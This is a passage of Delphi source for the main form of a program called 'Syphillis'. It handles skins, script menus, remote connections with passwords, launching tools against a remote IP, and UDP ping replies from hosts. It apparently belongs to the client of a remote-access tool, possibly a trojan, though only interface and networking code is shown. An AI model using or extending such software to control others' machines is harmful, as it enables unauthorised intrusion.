CurrentSkin := ReadString('Syphillis', 'SkinFile', 'Default.ssk');
Free;
end;

if AniFrameDelay = 0 then AniFrameDelay := 500;

Form38.Label1.Caption := 'Loading Skin...';
LoadSkin(SkinsDir + CurrentSkin);

Form38.Label1.Caption := 'Loading Tree...';
S := ExecuteScript('..\trees\' + CurrentTree, '');

if S <> '' then
MessageDlg(S, mtError, [mbOk], 0);

Form38.Label1.Caption := 'Autoexec Commands...';
S := ExecuteScript('autoexec.ssc', '');

if S <> '' then
MessageDlg(S, mtError, [mbOk], 0);

Form38.Label1.Caption := '';

Form38.Release;
end;

end;

procedure TForm1.LaunchTree(Sender: TObject);
var s: string;
begin
S := ExecuteScript('..\trees\' + (Sender as TMenuItem).caption + '.ssc', '');

if S = '' then
CurrentTree := (Sender as TMenuItem).caption + '.ssc' else
MessageDlg(S, mtError, [mbOk], 0);
end;

procedure TForm1.LaunchScript(Sender: TObject);
var s: string;
begin
S := ExecuteScript((Sender as TMenuItem).caption + '.ssc', '');

if S <> '' then
MessageDlg(S, mtError, [mbOk], 0);

end;

procedure TForm1.ServerList1Click(Sender: TObject);
begin
if Form2.ShowModal = mrOk then
ConnectTo(Form2.ListView1.Selected.Caption, '');
end;

procedure TForm1.WSocket1SessionClosed(Sender: TObject; Error: Word);
begin

if not Connecting then
begin
SetStatus('Disconnected from ' + RemoteIP + '.');
TreeView1.Hide;
Panel1.Show;
end;

end;

procedure TForm1.Disconnect1Click(Sender: TObject);
begin
if Connecting then
SetStatus('Failed: Connection was aborted.');

WSocket1.Abort;
end;

procedure TForm1.AppMessage(var Msg: TMsg; var Handled: Boolean);
var Conn, Pwd: string;
begin

if Msg.message = RegisterWindowMessage('SyphillisConnect') then
begin
Handled := True;

with TRegistry.Create do
begin
RootKey := HKEY_CURRENT_USER;
OpenKey('Software\Syphillis', true);
Conn := ReadString('ConnectTo');
DeleteValue('ConnectTo');

try
Pwd := ReadString('ConnectPwd');
DeleteValue('ConnectPwd');
except
Pwd := '';
end;

CloseKey;
Free;
end;

ConnectTo(Conn, Pwd);

end;

end;

procedure TForm1.UpdateDynamicMenus;
var a, i: integer;
    MenuItem: TMenuItem;
begin

while Tools1.Count > 0 do
Tools1.Delete(0);
while Trees1.Count > 0 do
Trees1.Delete(0);
while Scripts1.Count > 0 do
Scripts1.Delete(0);
while Skins1.Count > 0 do
Skins1.Delete(0);

FileListBox1.Directory := ToolsDir;
FileListBox1.Mask := '*.exe';
FileListBox1.Update;

for i := 0 to FileListBox1.Items.Count - 1 do
begin
MenuItem := TMenuItem.Create(Tools1);
MenuItem.Caption := '';
MenuItem.OnClick := LaunchTool;

for a := 1 to Length(ExtractFileName(FileListBox1.Items[i])) do
if ExtractFileName(FileListBox1.Items[i])[a] <> '.' then
MenuItem.Caption := MenuItem.Caption + ExtractFileName(FileListBox1.Items[i])[a] else
Break;

Tools1.Add(MenuItem);
end;


FileListBox1.Directory := TreeDir;
FileListBox1.Mask := '*.ssc';
FileListBox1.Update;

for i := 0 to FileListBox1.Items.Count - 1 do
begin
MenuItem := TMenuItem.Create(Trees1);
MenuItem.Caption := '';
MenuItem.OnClick := LaunchTree;

for a := 1 to Length(ExtractFileName(FileListBox1.Items[i])) do
if ExtractFileName(FileListBox1.Items[i])[a] <> '.' then
MenuItem.Caption := MenuItem.Caption + ExtractFileName(FileListBox1.Items[i])[a] else
Break;

Trees1.Add(MenuItem);
end;


FileListBox1.Directory := scriptDir;
FileListBox1.Mask := '*.ssc';
FileListBox1.Update;

for i := 0 to FileListBox1.Items.Count - 1 do
begin
MenuItem := TMenuItem.Create(Scripts1);
MenuItem.Caption := '';
MenuItem.OnClick := LaunchScript;

for a := 1 to Length(ExtractFileName(FileListBox1.Items[i])) do
if ExtractFileName(FileListBox1.Items[i])[a] <> '.' then
MenuItem.Caption := MenuItem.Caption + ExtractFileName(FileListBox1.Items[i])[a] else
Break;

Scripts1.Add(MenuItem);
end;

FileListBox1.Directory := SkinsDir;
FileListBox1.Mask := '*.ssk';
FileListBox1.Update;

for i := 0 to FileListBox1.Items.Count - 1 do
begin
MenuItem := TMenuItem.Create(Skins1);
MenuItem.Caption := '';
MenuItem.OnClick := LaunchSkin;

for a := 1 to Length(ExtractFileName(FileListBox1.Items[i])) do
if ExtractFileName(FileListBox1.Items[i])[a] <> '.' then
MenuItem.Caption := MenuItem.Caption + ExtractFileName(FileListBox1.Items[i])[a] else
Break;

Skins1.Add(MenuItem);
end;


end;

procedure TForm1.Tools1Click(Sender: TObject);
begin
if Tools1.Count = 0 then
MessageDlg('No tools are installed! Place Syphillis tools in the syphillis\tools directory.', mtError, [mbOk], 0);
end;

procedure TForm1.LaunchTool(Sender: TObject);
begin
if wSocket1.State = wsClosed then RemoteIP := 'NotConnected';
StartProgram(ToolsDir + (Sender as TMenuItem).Caption + '.exe', 'SyphillisTool ' + IntToStr(Application.Handle) + ' ' + RemoteIP, true);
end;

procedure TForm1.LaunchSkin(Sender: TObject);
begin
LoadSkin(SkinsDir + (Sender as TMenuItem).Caption + '.ssk');
CurrentSkin := (Sender as TMenuItem).caption + '.ssk';
end;

procedure TForm1.TreeView1DblClick(Sender: TObject);
var s, Reply: string;
begin

if TreeView1.Selected <> nil then
S := ScriptCommand('"!' + TreeView1.Selected.Text + '"', Reply);

if S <> '' then
MessageDlg(S, mtError, [mbOk], 0);

if Reply <> '' then
if Pos(#13#10, Reply) > 0 then
MessageDlg(Reply, mtInformation, [mbOk], 0);

end;

procedure TForm1.TreeView1Expanding(Sender: TObject; Node: TTreeNode;
  var AllowExpansion: Boolean);
begin
Node.ImageIndex := siTreeFolderOpen;
Node.SelectedIndex := siTreeFolderOpen;
end;

procedure TForm1.TreeView1Collapsing(Sender: TObject; Node: TTreeNode;
  var AllowCollapse: Boolean);
begin
Node.ImageIndex := siTreeFolderClosed;
Node.SelectedIndex := siTreeFolderClosed;
end;

procedure TForm1.ExpandAll1Click(Sender: TObject);
var i: integer;
begin

for i := 0 to TreeView1.Items.Count - 1 do
TreeView1.Items[i].Expand(false);

end;

procedure TForm1.CollapseAll1Click(Sender: TObject);
var i: integer;
begin

for i := 0 to TreeView1.Items.Count - 1 do
TreeView1.Items[i].Collapse(false);

end;

procedure TForm1.About1Click(Sender: TObject);
begin
Form4.Show;
end;

procedure TForm1.ScriptEditor1Click(Sender: TObject);
begin
Form21.Show;
end;

procedure TForm1.Console1Click(Sender: TObject);
begin
Form35.Visible := not Form35.visible;
end;

procedure TForm1.ListenerDataAvailable(Sender: TObject; Error: Word);
var Buffer : array [0..1023] of char;
    Len    : Integer;
    Src    : TSockAddrIn;
    SrcLen : Integer;
begin

SrcLen := SizeOf(Src);
Len := Listener.ReceiveFrom(@Buffer, SizeOf(Buffer), Src, SrcLen);

if Len >= 0 then
Buffer[Len] := #0;

ListeningIP.Add(StrPas(inet_ntoa(Src.sin_addr)));
ListeningBuf.Add(StrPas(Buffer));

ProcessListeningQueue;
end;

procedure TForm1.ProcessListeningQueue;
var t2, temp, FromIP: string;
    i: integer;
    seg: Tstringlist;
begin

if ListeningBuf.Count > 0 then
if not ProcListenQueue then
begin

ProcListenQueue := true;
Seg := TStringList.create;
t2 := ListeningBuf[0];
FromIP := ListeningIP[0];
ListeningBuf.Delete(0);
ListeningIP.Delete(0);

t2 := t2 + #0;

for i := 1 to length(t2) do
if t2[i] = #0 then
begin
seg.Add(temp);
temp := '';
end
else
temp := temp + t2[i];

if seg[0] = 'query_response' then
Form35.Memo1.Lines.Add('Ping reply from ' + FromIP + ': ' + StringLength(seg[3], 20) + ' ' + StringLength(seg[2], 10) + ' ' + StringLength(seg[5], 10) + ' ' + seg[4]);

Seg.Free;
ProcListenQueue := false;
ProcessListeningQueue;

end;

end;

procedure TForm1.Trees1Click(Sender: TObject);
begin
if Trees1.Count = 0 then
MessageDlg('No trees are installed! Place Syphillis trees in the syphillis\trees directory.', mtError, [mbOk], 0);
end;

procedure TForm1.Scripts1Click(Sender: TObject);
begin
if Scripts1.Count = 0 then
MessageDlg('No scripts are installed! Place Syphillis scripts in the syphillis\scripts directory.', mtError, [mbOk], 0);
end;

procedure TForm1.Preferences1Click(Sender: TObject);
begin

Form37.Edit1.Text := IntToStr(PassCount);
Form37.Edit2.Text := IntToStr(ScriptDelay);
Form37.Edit3.Text := Nickname;
Form37.CheckBox1.Checked := AutorunScript;
Form37.CheckBox2.Checked := AutocloseScript;

if Form37.ShowModal = mrOK then
begin
PassCount := StrToInt(Form37.Edit1.Text);
ScriptDelay := StrToInt(Form37.Edit2.Text);
Nickname := Form37.Edit3.Text;
AutorunScript := Form37.CheckBox1.Checked;
AutocloseScript := Form37.CheckBox2.Checked;
SaveSettings;
end;

end;

procedure TForm1.RefreshMenus1Click(Sender: TObject);
begin
UpdateDynamicMenus;
end;

procedure TForm1.DisplayAnnouncement(s: string);
begin
Label1.Caption := S;
Label2.Caption := S;
end;

procedure TForm1.UpdateAnnouncements;
var s, s2: String;
    i: integer;
begin
DisplayAnnouncement('Updating Announcements:' + #13#10#13#10 + 'Connecting...');
HTTPCli1.URL := 'http://24.113.89.245:8416/announce/announce.txt';

HTTPCli1.RcvdStream := TMemoryStream.Create;

try
HTTPCli1.Get;
except
HTTPCli1.RcvdStream.Free;
DisplayAnnouncement('Updating Announcements:' + #13#10#13#10 + 'Update failed.');
Exit;
end;

SetLength(S, HTTPCli1.RcvdStream.Size);
HTTPCli1.RcvdStream.Seek(0, soFromBeginning);
HTTPCli1.RcvdStream.Read(S[1], HTTPCli1.RcvdStream.Size);
HTTPCli1.RcvdStream.Free;

if s[1] <> '' then
begin
DisplayAnnouncement('Updating Announcements:' + #13#10#13#10 + 'Update failed.');
Exit;
end;

S := Copy(S, 2, Length(S));
S2 := '';

for i := 1 to Length(S) do
if s[i] = '' then
begin
SetLength(Announcements, Length(Announcements) + 1);
SetLength(AnnounceTime, Length(Announcements));
Announcements[Length(Announcements) - 1] := Copy(S2, 4, Length(S2));
AnnounceTime[Length(Announcements) - 1] := StrToInt(Copy(S2, 1, 3));
S2 := '';
end else
S2 := S2 + S[i];

AnnounceNum := 0;
Timer1.Interval := AnnounceTime[0] * 1000;
Timer1.Enabled := Length(Announcements) > 1;
DisplayAnnouncement(Announcements[0]);

end;

procedure TForm1.FormResize(Sender: TObject);
begin
Label1.Width := Panel1.Width - 22;
Label1.Height := Panel1.Height - 14;
Label2.Width := Panel1.Width - 22;
Label2.Height := Panel1.Height - 14;

case BGalign of
2: Image1.Left := ((Panel1.Width - 4) div 2) - (Image1.Width div 2);
3: Image1.Left := Panel1.Width - 4 - Image1.Width;
4: Image1.Top := ((Panel1.Height - 4) div 2) - (Image1.Height div 2);

7: Image1.Top := Panel1.Height - 4 - Image1.Height;
6: begin
Image1.Left := Panel1.Width - 4 - Image1.Width;
Image1.Top := ((Panel1.Height - 4) div 2) - (Image1.Height div 2);
end;
8: begin
Image1.Top := Panel1.Height - 4 - Image1.Height;
Image1.Left := ((Panel1.Width - 4) div 2) - (Image1.Width div 2);
end;
9: begin
Image1.Left := (Panel1.Width - 4) - Image1.Width;
Image1.Top := (Panel1.Height - 4) - Image1.Height;
end;
end;

end;

procedure TForm1.HttpCli1SessionConnected(Sender: TObject);
begin
DisplayAnnouncement('Updating Announcements:' + #13#10#13#10 + 'Downloading...');
end;

procedure TForm1.Timer1Timer(Sender: TObject);
begin
Inc(AnnounceNum);
Timer1.Interval := AnnounceTime[AnnounceNum] * 1000;
Timer1.Enabled := Length(Announcements) > AnnounceNum + 1;
DisplayAnnouncement(Announcements[AnnounceNum]);
end;

procedure TForm1.TreeView1Expanded(Sender: TObject; Node: TTreeNode);
begin
TreeView1.Repaint;
end;

procedure TForm1.TreeView1Collapsed(Sender: TObject; Node: TTreeNode);
begin
TreeView1.Repaint;
end;

procedure TForm1.FormActivate(Sender: TObject);
const Done: boolean = false;
begin

if not Done then
begin
Done := True;
UpdateAnnouncements;
end;

end;

procedure TForm1.Skins1Click(Sender: TObject);
begin
if Skins1.Count = 0 then
MessageDlg('No skins are installed! Place Syphillis skins in the syphillis\skins directory.', mtError, [mbOk], 0);
end;

procedure TForm1.Reconnect1Click(Sender: TObject);
begin
ConnectTo(ReconnectIP, '');
end;

procedure TForm1.WSocket1SendData(Sender: TObject; BytesSent: Integer);
begin
StatusBar1.Panels[0].Text := IntToStr(StrToInt(StatusBar1.Panels[0].Text) + BytesSent);
end;

end.
